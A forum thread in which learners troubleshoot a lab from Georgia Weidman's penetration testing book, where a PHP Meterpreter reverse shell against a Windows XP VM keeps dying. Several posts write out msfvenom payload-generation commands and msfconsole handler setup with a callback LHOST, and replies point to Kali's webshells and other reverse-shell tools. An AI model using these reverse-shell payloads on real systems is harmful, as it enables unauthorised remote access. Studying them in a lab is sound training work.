Ready to Start Your Career?

Georgia Weidman Chapter 8 - Php/meterpreter/reverse_tcp With Kali 2016

Author's profile image

January 1, 2016

I was wondering how many of you have tried to run the exploit php/meterpreter/reverse\_tcp lately with the new Kali 2016 rolling. First off, to problem solve I did make sure the machine was completely dist-upgrade/update/upgrade and restarted the machine. In the chapter of Weidman's book we are trying to take advantage of the Windows XP vm which is vulnerable to this exploit. The directions we follow are: To create payload: msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.... LPORT=2323 -f raw > meterpreter.php This creates a payload that we can want the victim to execute. msfconsole use exploit multi/handler set payload php/meterpreter/reverse\_tcp set LHOST 192... set LPORT 2323 exploit On our vm of windows xp we open the meterpreter.php file Back in our Kali terminal we see that it recognized the vm opening the php file and get: \[\*\] Meterpreter session 1 opened but then metasploit gives the error: Meterpreter session 1 closed. Reason: Died So I am hoping that someone can try this on the new Kali and see if they are getting the same result. I appreciate any advice or suggestions that you have. Thank you, crowbotham I don't know if this will be much help or not, but I've seen this behavior in other courses I've taken (I've got Georgia's book but haven't gone through it all yet) and I've found the php/meterpreter/reverse\_tcp payload to be unstable at times. I've also seen it die when the process on the victim machine I've exploited dies, so if I don't migrate processes quickly I lose the shell. Yeah I think what might be happening too is that the VM isn't stable enough to keep the connection open. Could be that I do not have enough RAM or processing power but when I run the exploit against my Ubuntu box (non vm) it works so it must be some issue with the VM. Thanks for your reply though and I have tried to migrate process quick but still it doesn't give me enough time to even hit enter for the migrate command to go through. Like I said though, I had on older desktop that I just threw Ubuntu on it and then ran the exploit and it worked. Hi, actually im running into the same issue. As soon as i get a php meterpreter session the session dies and exits. The issue is that im getting a partial meterpreter session, some commands like sysinfo are not available. If i retry like 10 times then i get a 10 extra seconds more stable session and some additional commands. What could be the issue? also when trying to run post exploitation modules with php meterpreter session i get tons on errors ... Is this like an indentified bug or something? Any lights will be appretiated When I have to deal with meterpreter and PHP generated with msfvenom I have the same issue. Maybe try to migrate into another process when this is possible in the meterpreter session before it dies. When you are satisfied with a normal reverse shell you could use "weevely" tool in Kali to generate your own password protected shell. Kali comes with several webshells "/usr/share/webshells/". The reverse shell from "Pentestmonkey" is fantastic. So its August of 2017, I know this post was posted a while back but I am currently going through this chapter at the moment having the exact same issues. However, you said your issue might not be enough ram, but I gave double the ram to the xp vm and I am still experiencing the issue. Has anyone resolved this yet? Or did you personally ever find a solution? Thanks You know, I never solved it. I just moved on past it. Now knowing more about metasploit I would probably try to run the exploit with the -j tag which will background the session first. Don't know if it will work but it's worth a try. To be honest I skipped past it because I knew the theory behind it and could tell what it was supposed to do. Georgia's book is all about learning the concepts and tools and with how quick those change it was good enough to understand what was trying to be accomplished. Good luck and I'm sorry I couldn't be more help. Exploit -j doesn't have any effect on this. I'm using Kali 2017 v. 2 and I can't get a stable Meterpreter session. I noticed she changes the command in the video and ends the command with a redirection (> meterpreter.php) instead of using -f raw as described in the book. Someone suggested this on Stack Overflow but it doesn't solve the problem. EDIT: I have the same issue, and I'm annoyed because I \*think\* that it worked for me the first time I tried a couple of weeks ago, after following the videos and using exploit -j and ExitOnSession "false" . But perhaps it's a retrospective illusion due to wishful thinking :) I get a "Meterpreter session 1 is not valid and will be closed" after 10-15 seconds whether I use a 2-stages php/meterpreter/reverse\_tcp, or a 1-stage version php/meterpreter\_reverse\_tcp. msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter2stages.php + use multi/handler set payload php/meterpreter/reverse\_tcp msfvenom -p php/meterpreter\_reverse\_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter1stage.php + use multi/handler set payload php/meterpreter\_reverse\_tcp No change if using -f raw, -o, or redirection with > Glad I'm not alone...
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry